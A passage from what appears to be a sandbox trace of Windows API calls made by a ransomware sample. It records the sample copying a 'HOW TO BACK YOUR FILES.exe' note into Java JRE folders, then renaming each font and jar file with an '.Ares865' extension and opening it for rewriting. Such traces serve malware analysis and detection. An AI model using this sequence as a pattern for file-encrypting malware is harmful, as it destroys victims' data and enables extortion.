(x86)\\Java\\jre7\\lib\\i386\\jvm.cfg.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\i386\\jvm.cfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.342] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=686) returned 1 [0136.345] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts" [0136.345] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts" [0136.345] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0136.346] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\how to back your files.exe"), bFailIfExists=1) returned 0 [0136.346] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0136.347] GetLastError () returned 0x0 [0136.347] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0136.347] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x531799c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x531799c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0136.347] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0136.347] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0136.347] lstrcpyW (in: lpString1=0x2cce456, lpString2="LucidaBrightDemiBold.ttf" | out: lpString1="LucidaBrightDemiBold.ttf") returned="LucidaBrightDemiBold.ttf" [0136.347] lstrlenW (lpString="LucidaBrightDemiBold.ttf") returned 24 [0136.347] lstrlenW (lpString="Ares865") returned 7 [0136.347] lstrcmpiW (lpString1="old.ttf", lpString2="Ares865") returned 1 [0136.348] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiBold.ttf.Ares865") returned 75 [0136.348] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemibold.ttf"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiBold.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemibold.ttf.ares865"), dwFlags=0x1) returned 1 [0136.350] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiBold.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemibold.ttf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.350] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=75144) returned 1 [0136.392] lstrcpyW (in: lpString1=0x2cce456, lpString2="LucidaBrightDemiItalic.ttf" | out: lpString1="LucidaBrightDemiItalic.ttf") returned="LucidaBrightDemiItalic.ttf" [0136.392] lstrlenW (lpString="LucidaBrightDemiItalic.ttf") returned 26 [0136.392] lstrlenW (lpString="Ares865") returned 7 [0136.392] lstrcmpiW (lpString1="lic.ttf", lpString2="Ares865") returned 1 [0136.392] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiItalic.ttf.Ares865") returned 77 [0136.392] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiItalic.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemiitalic.ttf"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiItalic.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemiitalic.ttf.ares865"), dwFlags=0x1) returned 1 [0136.395] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiItalic.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemiitalic.ttf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.395] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=75124) returned 1 [0136.402] lstrcpyW (in: lpString1=0x2cce456, lpString2="LucidaBrightItalic.ttf" | out: lpString1="LucidaBrightItalic.ttf") returned="LucidaBrightItalic.ttf" [0136.402] lstrlenW (lpString="LucidaBrightItalic.ttf") returned 22 [0136.402] lstrlenW (lpString="Ares865") returned 7 [0136.402] lstrcmpiW (lpString1="lic.ttf", lpString2="Ares865") returned 1 [0136.403] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightItalic.ttf.Ares865") returned 73 [0136.403] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightitalic.ttf"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightItalic.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightitalic.ttf.ares865"), dwFlags=0x1) returned 1 [0136.405] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightItalic.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightitalic.ttf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.405] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=80856) returned 1 [0136.412] lstrcpyW (in: lpString1=0x2cce456, lpString2="LucidaBrightRegular.ttf" | out: lpString1="LucidaBrightRegular.ttf") returned="LucidaBrightRegular.ttf" [0136.412] lstrlenW (lpString="LucidaBrightRegular.ttf") returned 23 [0136.412] lstrlenW (lpString="Ares865") returned 7 [0136.412] lstrcmpiW (lpString1="lar.ttf", lpString2="Ares865") returned 1 [0136.412] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightRegular.ttf.Ares865") returned 74 [0136.413] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightregular.ttf"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightRegular.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightregular.ttf.ares865"), dwFlags=0x1) returned 1 [0136.414] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightRegular.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightregular.ttf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.414] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=344908) returned 1 [0136.435] lstrcpyW (in: lpString1=0x2cce456, lpString2="LucidaSansDemiBold.ttf" | out: lpString1="LucidaSansDemiBold.ttf") returned="LucidaSansDemiBold.ttf" [0136.435] lstrlenW (lpString="LucidaSansDemiBold.ttf") returned 22 [0136.435] lstrlenW (lpString="Ares865") returned 7 [0136.435] lstrcmpiW (lpString1="old.ttf", lpString2="Ares865") returned 1 [0136.435] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansDemiBold.ttf.Ares865") returned 73 [0136.436] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansdemibold.ttf"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansDemiBold.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansdemibold.ttf.ares865"), dwFlags=0x1) returned 1 [0136.438] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansDemiBold.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansdemibold.ttf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.438] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=317896) returned 1 [0136.461] lstrcpyW (in: lpString1=0x2cce456, lpString2="LucidaSansRegular.ttf" | out: lpString1="LucidaSansRegular.ttf") returned="LucidaSansRegular.ttf" [0136.461] lstrlenW (lpString="LucidaSansRegular.ttf") returned 21 [0136.461] lstrlenW (lpString="Ares865") returned 7 [0136.461] lstrcmpiW (lpString1="lar.ttf", lpString2="Ares865") returned 1 [0136.461] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansRegular.ttf.Ares865") returned 72 [0136.461] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansregular.ttf"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansRegular.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansregular.ttf.ares865"), dwFlags=0x1) returned 1 [0136.463] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansRegular.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansregular.ttf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.463] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=698236) returned 1 [0136.502] lstrcpyW (in: lpString1=0x2cce456, lpString2="LucidaTypewriterBold.ttf" | out: lpString1="LucidaTypewriterBold.ttf") returned="LucidaTypewriterBold.ttf" [0136.502] lstrlenW (lpString="LucidaTypewriterBold.ttf") returned 24 [0136.502] lstrlenW (lpString="Ares865") returned 7 [0136.502] lstrcmpiW (lpString1="old.ttf", lpString2="Ares865") returned 1 [0136.502] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterBold.ttf.Ares865") returned 75 [0136.502] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterbold.ttf"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterBold.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterbold.ttf.ares865"), dwFlags=0x1) returned 1 [0136.505] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterBold.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterbold.ttf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.505] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=234068) returned 1 [0136.585] lstrcpyW (in: lpString1=0x2cce456, lpString2="LucidaTypewriterRegular.ttf" | out: lpString1="LucidaTypewriterRegular.ttf") returned="LucidaTypewriterRegular.ttf" [0136.586] lstrlenW (lpString="LucidaTypewriterRegular.ttf") returned 27 [0136.586] lstrlenW (lpString="Ares865") returned 7 [0136.586] lstrcmpiW (lpString1="lar.ttf", lpString2="Ares865") returned 1 [0136.588] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterRegular.ttf.Ares865") returned 78 [0136.588] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterregular.ttf"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterRegular.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterregular.ttf.ares865"), dwFlags=0x1) returned 1 [0136.596] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterRegular.ttf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterregular.ttf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.596] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=242700) returned 1 [0136.774] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext" [0136.778] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext" [0136.780] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0136.780] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\how to back your files.exe"), bFailIfExists=1) returned 0 [0136.784] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0136.787] GetLastError () returned 0x0 [0136.788] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0136.790] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74470c60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5319fb20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5319fb20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0136.792] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0136.792] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0136.792] lstrcpyW (in: lpString1=0x2cce452, lpString2="access-bridge-32.jar" | out: lpString1="access-bridge-32.jar") returned="access-bridge-32.jar" [0136.792] lstrlenW (lpString="access-bridge-32.jar") returned 20 [0136.795] lstrlenW (lpString="Ares865") returned 7 [0136.797] lstrcmpiW (lpString1="-32.jar", lpString2="Ares865") returned -1 [0136.801] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar.Ares865") returned 69 [0136.802] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\access-bridge-32.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\access-bridge-32.jar.ares865"), dwFlags=0x1) returned 1 [0136.819] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\access-bridge-32.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.819] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=84216) returned 1 [0136.877] lstrcpyW (in: lpString1=0x2cce452, lpString2="dnsns.jar" | out: lpString1="dnsns.jar") returned="dnsns.jar" [0136.877] lstrlenW (lpString="dnsns.jar") returned 9 [0136.878] lstrlenW (lpString="Ares865") returned 7 [0136.878] lstrcmpiW (lpString1="sns.jar", lpString2="Ares865") returned 1 [0136.878] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar.Ares865") returned 58 [0136.879] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\dnsns.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\dnsns.jar.ares865"), dwFlags=0x1) returned 1 [0136.890] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\dnsns.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.890] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8934) returned 1 [0136.911] lstrcpyW (in: lpString1=0x2cce452, lpString2="jaccess.jar" | out: lpString1="jaccess.jar") returned="jaccess.jar" [0136.911] lstrlenW (lpString="jaccess.jar") returned 11 [0136.912] lstrlenW (lpString="Ares865") returned 7 [0136.914] lstrcmpiW (lpString1="ess.jar", lpString2="Ares865") returned 1 [0136.917] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar.Ares865") returned 60 [0136.918] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\jaccess.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\jaccess.jar.ares865"), dwFlags=0x1) returned 1 [0136.925] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\jaccess.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.925] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43594) returned 1 [0136.947] lstrcpyW (in: lpString1=0x2cce452, lpString2="localedata.jar" | out: lpString1="localedata.jar") returned="localedata.jar" [0136.948] lstrlenW (lpString="localedata.jar") returned 14 [0136.948] lstrlenW (lpString="Ares865") returned 7 [0136.948] lstrcmpiW (lpString1="ata.jar", lpString2="Ares865") returned 1 [0136.948] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar.Ares865") returned 63 [0136.949] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\localedata.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\localedata.jar.ares865"), dwFlags=0x1) returned 1 [0136.955] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\localedata.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.956] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1014029) returned 1 [0137.122] lstrcpyW (in: lpString1=0x2cce452, lpString2="meta-index" | out: lpString1="meta-index") returned="meta-index" [0137.122] lstrlenW (lpString="meta-index") returned 10 [0137.122] lstrlenW (lpString="Ares865") returned 7 [0137.122] lstrcmpiW (lpString1="a-index", lpString2="Ares865") returned -1 [0137.122] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\meta-index.Ares865") returned 59 [0137.122] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\meta-index" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\meta-index"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\meta-index.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\meta-index.ares865"), dwFlags=0x1) returned 1 [0137.125] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\meta-index.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\meta-index.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.125] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=829) returned 1 [0137.129] lstrcpyW (in: lpString1=0x2cce452, lpString2="sunec.jar" | out: lpString1="sunec.jar") returned="sunec.jar" [0137.129] lstrlenW (lpString="sunec.jar") returned 9 [0137.129] lstrlenW (lpString="Ares865") returned 7 [0137.129] lstrcmpiW (lpString1="nec.jar", lpString2="Ares865") returned 1 [0137.129] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar.Ares865") returned 58 [0137.129] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunec.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunec.jar.ares865"), dwFlags=0x1) returned 1 [0137.133] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunec.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.133] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15941) returned 1 [0137.138] lstrcpyW (in: lpString1=0x2cce452, lpString2="sunjce_provider.jar" | out: lpString1="sunjce_provider.jar") returned="sunjce_provider.jar" [0137.138] lstrlenW (lpString="sunjce_provider.jar") returned 19 [0137.138] lstrlenW (lpString="Ares865") returned 7 [0137.138] lstrcmpiW (lpString1="der.jar", lpString2="Ares865") returned 1 [0137.138] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar.Ares865") returned 68 [0137.138] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunjce_provider.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunjce_provider.jar.ares865"), dwFlags=0x1) returned 1 [0137.140] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunjce_provider.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.140] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=198013) returned 1 [0137.157] lstrcpyW (in: lpString1=0x2cce452, lpString2="sunmscapi.jar" | out: lpString1="sunmscapi.jar") returned="sunmscapi.jar" [0137.157] lstrlenW (lpString="sunmscapi.jar") returned 13 [0137.157] lstrlenW (lpString="Ares865") returned 7 [0137.157] lstrcmpiW (lpString1="api.jar", lpString2="Ares865") returned -1 [0137.157] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar.Ares865") returned 62 [0137.157] MoveFileExW 